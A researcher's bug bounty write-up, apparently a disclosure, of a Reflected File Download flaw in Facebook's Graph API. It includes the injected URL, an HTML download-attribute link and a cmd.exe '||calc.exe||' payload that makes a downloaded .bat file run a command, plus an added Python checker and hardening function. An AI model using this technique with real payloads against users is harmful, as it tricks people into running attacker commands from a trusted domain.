Before starting with the write-up, I want to share the response that I got from Facebook after reporting the bug.
Hi Rio,
Thank you for sharing this information with us. Although this issue does not qualify as a part of our bounty program we appreciate your report. We will follow up with you on any security bugs or with any further questions we may have.
I will let you guys decide if it's a vulnerability or not.
Let's begin.
The vulnerability existed, and still exists, at
https://graph.facebook.com/
It exists because the API reflects data taken from the URL path back into its response body, so we can inject a payload of our choosing and have the server hand it back to the browser.
Visiting the following URL shows the reflection (the callback parameter makes the API wrap the reply in a JSONP-style function call, and the injected text comes back inside it):
https://graph.facebook.com/injected%20in%20json%7C%7Ccalc.exe%7C%7C?callback=random
Since the data is reflected, our main goal is to get this response saved to disk as a file with an extension of our choosing.
Facebook did not send a Content-Disposition header, which is what would pin the filename on the server side, so our way to force the download is the HTML5 download attribute, which lets the linking page pick the filename and extension. Note that current browsers ignore the download attribute on cross-origin links, so this step relied on the browser behaviour at the time of the report.
Let's create an HTML file ("test.html") with the following content.
<a href='https://graph.facebook.com/rio/;/test.bat;"||calc.exe||?callback=random' download="test.bat">Download</a>
Now let's open test.html and click Download.
Basically we downloaded a .bat file served from the facebook.com domain with our injected payload inside it. The payload is built around cmd.exe's || operator, which runs the command on its right whenever the command on its left fails; the rest of the reflected JSON is not a valid command, so when the batch file runs, calc.exe is executed.
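The three things the steps above depend on (the payload is reflected verbatim, no Content-Disposition pins the filename, and the reflected line runs as commands once cmd.exe parses it) can be checked offline against a captured response. The following is an added example, not code from the original post or from Facebook; the sample response is constructed to resemble a JSONP error reply that echoes the path, not a capture of graph.facebook.com, and the cmd.exe splitting model is deliberately simplified.

```python
"""Offline check for a Reflected File Download (RFD) condition.

Added example, not from the original post. SAMPLE_BODY is a constructed
JSONP-style error reply that echoes the request path (with the quote
JSON-escaped); it is not a capture of the real graph.facebook.com response.
"""
import re
from typing import Dict, List

# Shell-operator payload from the post: the quote closes the string cmd.exe
# sees as quoted text, and "||" runs the next command when the previous fails.
PAYLOAD = '"||calc.exe||'

# Constructed sample response (assumption: a JSONP error that reflects the path).
SAMPLE_HEADERS = {
    "Content-Type": "text/javascript; charset=UTF-8",
    "Cache-Control": "no-store",
}
SAMPLE_BODY = (
    '/**/ random({"error":{"message":"Unknown path components: '
    '/rio/;/test.bat;\\"||calc.exe||","type":"OAuthException","code":2500}});'
)


def cmd_commands(line: str) -> List[str]:
    """Simplified model of how cmd.exe splits one line into commands.

    Operators (||, &&, &, |) count only outside double quotes. Backslash is not
    an escape character for cmd, so the JSON-escaped \\" still toggles quote
    mode, which is exactly what lets the payload break out of the string.
    """
    commands, current, in_quotes, i = [], [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quotes = not in_quotes
        elif not in_quotes and line.startswith(("||", "&&"), i):
            commands.append("".join(current).strip())
            current, i = [], i + 2
            continue
        elif not in_quotes and ch in "&|":
            commands.append("".join(current).strip())
            current, i = [], i + 1
            continue
        current.append(ch)
        i += 1
    commands.append("".join(current).strip())
    return commands


def rfd_findings(headers: Dict[str, str], body: str,
                 payload: str = PAYLOAD) -> Dict[str, bool]:
    """Evaluate the three RFD conditions for one captured response."""
    h = {k.lower(): v for k, v in headers.items()}
    command = payload.strip('"|')                      # e.g. "calc.exe"
    # 1. The operator part of the payload comes back unmodified.
    reflected = payload.lstrip('"') in body
    # 2. Nothing pins the filename, so the download attribute (where a browser
    #    honours it cross-origin) decides the name and extension.
    disp = h.get("content-disposition", "").lower()
    filename_pinned = disp.startswith("attachment") and "filename=" in disp
    # 3. Saved as a .bat, the line yields the injected command on its own.
    runnable = command in cmd_commands(body)
    return {
        "reflected": reflected,
        "filename_pinned": filename_pinned,
        "runnable_as_batch": runnable,
        "exploitable": reflected and runnable and not filename_pinned,
    }


# Server-side fix: pin the filename and refuse unusual callback names.
CALLBACK_RE = re.compile(r"^[A-Za-z0-9_.]{1,64}$")


def harden(headers: Dict[str, str], callback: str) -> Dict[str, str]:
    """Return response headers with the RFD mitigations applied."""
    if not CALLBACK_RE.match(callback):
        raise ValueError("callback must be a plain identifier")
    fixed = dict(headers)
    # The browser now saves under this name regardless of any download attribute.
    fixed["Content-Disposition"] = 'attachment; filename="response.json"'
    fixed["X-Content-Type-Options"] = "nosniff"
    return fixed


if __name__ == "__main__":
    print(cmd_commands(SAMPLE_BODY))
    print(rfd_findings(SAMPLE_HEADERS, SAMPLE_BODY))
    print(rfd_findings(harden(SAMPLE_HEADERS, "random"), SAMPLE_BODY))
```

Running it lists the commands cmd.exe would see (the second one is calc.exe on its own, which is why the payload sandwiches it between two || operators), reports the sample as exploitable, and shows that adding a Content-Disposition header with a fixed filename is enough to take the filename out of the attacker's hands even though the reflection itself is unchanged.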
VIDEO:
Thanks
Rio Sherri